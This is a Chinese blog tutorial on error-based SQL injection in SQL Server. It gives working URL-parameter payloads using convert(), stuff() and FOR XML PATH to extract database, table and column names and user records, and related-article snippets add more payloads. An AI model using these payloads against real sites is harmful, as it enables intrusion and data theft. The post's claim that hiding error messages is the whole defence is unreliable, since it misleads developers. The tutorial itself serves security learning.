SQL Server 报错注入(一)

最新推荐文章于 2025-02-14 16:12:22 发布
最新推荐文章于 2025-02-14 16:12:22 发布
阅读量4.7k 收藏 17
点赞数 5
分类专栏: SQL注入 文章标签: sql sqlserver 依赖注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzgslh/article/details/111695332
版权

一、原理介绍

报错注入,顾名思义首先这里是有报错信息才可以,其次我们需要人为的制造一些错误,比如使用convert()函数进行类型转换时,如果类型转换失败就会报错,然后这里把我们要执行的SQL语句与convert()函数组合起来,例如convert(int,@@version),在报错信息中就有我们需要的信息。

二、函数介绍

convert()函数介绍:
定义: convert() 函数是把日期转换为新数据类型的通用函数。
用法: convert(int,db_name()),含义是将第二个参数的值转换成第一个参数的int类型。利用MSSQL在转换类型的时候就出错,来爆数据库信息。

quotename()函数介绍:
定义: quotename() 函数默认在要处理的参数左右加上两个中括号,起到分隔符的作用,避免出现sql关键字异常。
用法: quotename(name),给查询出的多个表名、列名加入中括号,或者其他符号为分隔符,进行分割,可使SQL注入结果更清晰。

for xml path(’’)语句介绍:
定义: 提供查询返回的结果为xml格式,此时返回的相当于一个字符串。
用法: 将查询到的数据,通过xml进行显示,path指定xml元素结点(行节点),该语句可以将查询到的所有数据通过XML进行显示。
在这里插入图片描述
stuff()函数介绍:
定义: stuff()函数将表中列的内容横向输出。
用法: stuff(param1, startIndex, length, param2),将param1中自startIndex(SQL中都是从1开始,而非0)起,删除length个字符,然后用param2替换删掉的字符。

三、常用数据表介绍

​ 在master数据库中包含了很多系统表,其中sys.databases这张表中储存了SQLServer中所有的数据库的库名;sys.objects表中储存了SQLServer中所有的数据库的表名;sys.columns表中储存了SQLServer中所有的数据表的列名。
在这里插入图片描述

四、注入方式

1.爆数据库

id=1' and 1=convert(int,(select db_name(0)))--+
id=1' and 1=convert(int,(select db_name(1)))--+   //查询第二个数据库,以此类推

在这里插入图片描述
将所有的数据库连接起来进行显示。

id=1' and 1=convert(int,stuff((select quotename(name) from sys.databases for xml path('')),1,0,''))--+

在这里插入图片描述
2.爆数据表

id=1' and 1=convert(int,(select top 1 name from test.sys.objects where type='U'))--+
id=1' and 1=convert(int,stuff((select  quotename(name) from test.sys.objects where type='U' for xml path('')),1,0,''))--+

在这里插入图片描述
将所有表连接起来进行显示。
在这里插入图片描述
3.爆字段(此处方法同上)

id=1' and 1=convert(int,(select top 1 name from test.sys.columns where object_id=object_id('users')))--+
id=1' and 1=convert(int,stuff((select quotename(name) from test.sys.columns where object_id=object_id('users') for xml path('')),1,0,''))--+

在这里插入图片描述
在这里插入图片描述
4.爆数据

id=1' and 1=convert(int,(select top 1 username from users))--+
id=1' and 1=convert(int,stuff((select quotename(username) from users for xml path('')),1,0,''))--+

在这里插入图片描述
在这里插入图片描述

五、防御方式

关闭错误提示即可

SQL注入篇——SqlServer报错注入
爱国小白帽
02-12 3471
、获取当前的数据库 使用函数db_name() id=1 and 1=convert(int,(select top 1 db_name())) 二、获取当前数据库的表 将获取到的数据库名与.sys.sysobjects拼接 id=1 and 1= convert(int,(select top 1 name FROM text.sys.sysobjects where xtype = 'U...
sql注入——sqlserver报错注入
cxrpty的博客
02-12 6101
注入的条件是必须有报错信息 用到函数convert(int,(select top 1 db_name() )),其含义是将第二个参数的值转换成第个参数的int类型 、打开文件,如下图所示,有报错信息: 二、查看数据库 输入:http://192.168.1.106/1.php?id=1 and 1=convert(int,(select top 1 db_name()));这里...
初级黑客入门之sql注入报错分享(mssql+mysql),黑客技术零基础入门到精通实战教程!
最新发布
白帽阿叁的博客
02-14 938
当超过mysql的整形的时候,就会导致溢出,mysql可能会将错误信息带出。这里user()是字母默认为0 取反以后+1可能就会导致异常。不需要函数 ,直接让他报错出来也可以利用函数的参数让其报错absExpAvgBIT_AND后续还有很多就不列举了,直接burp跑波结果其他请自行fuzz。
sql注入之——sqlserver报错注入
wsnbbz的博客
02-12 1733
条件 必须有错误回显 函数 convert(int,(select top 1 db_name() )):将第二个参数的值转换成第个参数的int类型 查看数据库 ?id=1 and 1=convert(int,(select top 1 db_name())) 查看数据库有哪些表 ?id=1 and 1=convert(int,(select top 1 name from test.sys....
SQL Server从0到1——报错注入
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-04 607
【代码】SQL Server从0到1——报错注入
72.网络安全渗透测试—[SQL注入篇11]—[SQLSERVER+ASP-报错注入]
qwsn
01-18 3247
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 SQLSERVER+ASP 报错注入 1、sql server报错页面 2、SQLSERVER+ASP 报错注入示例
sql注入报错注入
m0_63436163的博客
08-27 1372
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
sql注入——报错注入
m0_73756016的博客
10-18 3414
报错注入是什么 什么是报错注入? 这是种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
【网络安全-SQL注入(4)】篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入SQL注入点利用以及getshell_sqlsever数据库报错注入(1)
2401_84970415的博客
05-13 825
自我介绍下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SQL注入---报错注入
zhoutong2323的博客
04-04 1429
SQL注入报错攻击中,攻击者通过在用户输入的位置注入恶意的SQL代码,使应用程序拼接出错误的SQL语句。当数据库执行错误的SQL语句时,会返回错误信息,这些错误信息可能包含数据库的具体错误信息、相关的数据和表结构等敏感信息。攻击者通过分析这些错误信息来获取相关的数据或者进步攻击数据库。案例分析:上述sql注入中认为将正确的sql语句database() 改为错误的sql语句 datadase()数据库回显内容为:FUNCTION security.datadase does not exist。
sql注入报错注入
2302_79119987的博客
04-19 2151
实行注入的地方。
73.网络安全渗透测试—[SQL注入篇12]—[SQLSEVER+ASP-视图查询报错注入]
qwsn
01-18 2383
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 SQLSEVER+ASP 视图查询报错注入 1、SQLSERVER 视图概念 2、SQLSEVER+ASP 视图查询报错注入示例
sqlserver注入
qq_49714982的博客
02-20 1700
cmd登录mssql:osql -S 127.0.0.1 -U sa -P 134679258qaZ@使用数据库:use test查询语句:select * from users查询所有数据库:select name from sysdatabases查看当前数据库所有的表:select name from sysobjects。
sql报错注入用法及详解
十五年游戏主程转渗透之路
03-29 1156
floor注入及原理,updatexml注入及原理,extractvalue注入及原理
Sql server注入分类之报错注入
qq_42990434的博客
12-16 460
本章目录:报错查询注入语句先统计总共有多少库第步:获取库名第二步:获取表第三步:获取列名第四步:获取列数据扩展 报错查询注入语句 id=8’ //报错 id=8 and 1=1 / and 1=2 //1=1 页面返回正常,1=2 页面返回不正常,证明我们的语句代入进去执行了,其实这种判断可以有很多拓展 id=8 and exists(select * from sysobjects) //确实目标是否真的为mssql数据库,页面返回正常则是 id=8and 1=CONVERT(i
sql报错注入实例
xy_259的博客
01-14 528
题目地址 bugku 多次 http://123.206.87.240:9004/ 本地有两个部分,第关的界面如下, 加上单引号出现报错,再加上23%可以显示正常的界面,发现过滤了很多的字符,在这里用异或(^)的方式检查过滤了哪些字符, 异或:当同时为真或者假的时候为假 然后就可以构造payload;来测试过滤了哪些字符 因为length(‘or’)!=0 为真,所以应该会报错,而此时没...
SQL注入报错注入
qq_68163788的博客
01-27 3143
QL注入种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进步利用数据库。
SQL注入--报错注入
liukenn的博客
07-30 3450
个带get参数的网站并且不从数据库返回数据,但存在报错信息 http://127.0.0.1/index.php?id=1 http://127.0.0.1/index.php?id=1' 查看字段情况: http://127.0.0.1/index.php?id=1' order by 3%23 http://127.0.0.1/index.php?id=1'
CTF 题集SQL报错注入
01-14
### CTF SQL Error Based Injection Challenges and Solutions In the realm of Capture The Flag (CTF) competitions, SQL error-based injection stands as a critical skill for participants to master. This technique leverages database errors returned by an application when malformed or unexpected input is provided during query execution[^1]. #### Understanding SQL Error-Based Injection Error-based SQL injection occurs due to improper handling of user-supplied data within SQL queries. When attackers provide inputs that cause syntax errors in these statements, detailed error messages can reveal information about the structure of the underlying tables and columns used by applications. For instance, consider an insecure login form where usernames are directly inserted into SQL commands without proper sanitization: ```sql SELECT * FROM users WHERE username='admin' AND password='password'; ``` By injecting specific payloads like `' OR '1'='1`—which results in invalid SQL code—the server might respond with informative but unintended details regarding its internal workings[^2]. #### Practical Example: Exploiting Vulnerabilities Through Errors Suppose there exists a web page vulnerable to this type of attack at `http://example.com/login`. An attacker could attempt various forms of malicious entries until they receive useful feedback from MySQL's error reporting system. For example: - Entering `%27 UNION SELECT NULL,NULL-- %00` may lead to responses indicating how many fields exist per row. - Using constructs such as `%27 ORDER BY 3--+`, one can deduce column counts through trial-and-error while observing changes in output patterns caused by sorting operations gone wrong. These insights allow hackers not only to confirm whether their target indeed suffers from poor coding practices but also potentially extract sensitive records stored inside databases linked against affected sites. #### Mitigation Strategies Against Such Attacks Developers should always validate all external inputs rigorously before incorporating them into dynamic queries. Prepared statements offer significant protection since parameters passed via placeholders cannot alter statement logic regardless of content supplied by end-users. Additionally, employing least privilege principles ensures even compromised accounts have minimal access rights over valuable assets residing on backend servers[^3]. ```python import mysql.connector connection = mysql.connector.connect( host="localhost", user="db_user", passwd="secure_password", database="test_db" ) cursor = connection.cursor(prepared=True) query = "INSERT INTO table_name VALUES (%s)" data_tuple = ('safe_value',) cursor.execute(query, data_tuple) connection.commit() ``` --related questions-- 1. What measures can developers take beyond prepared statements? 2. How do different relational management systems handle SQL injections differently? 3. Are certain programming languages more prone than others towards producing vulnerabilities related to SQL injection attacks? 4. In what ways has modern software development mitigated risks associated with traditional types of security flaws including those seen here today concerning SQLi techniques specifically targeting error disclosure mechanisms found across numerous platforms worldwide throughout history up till now?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值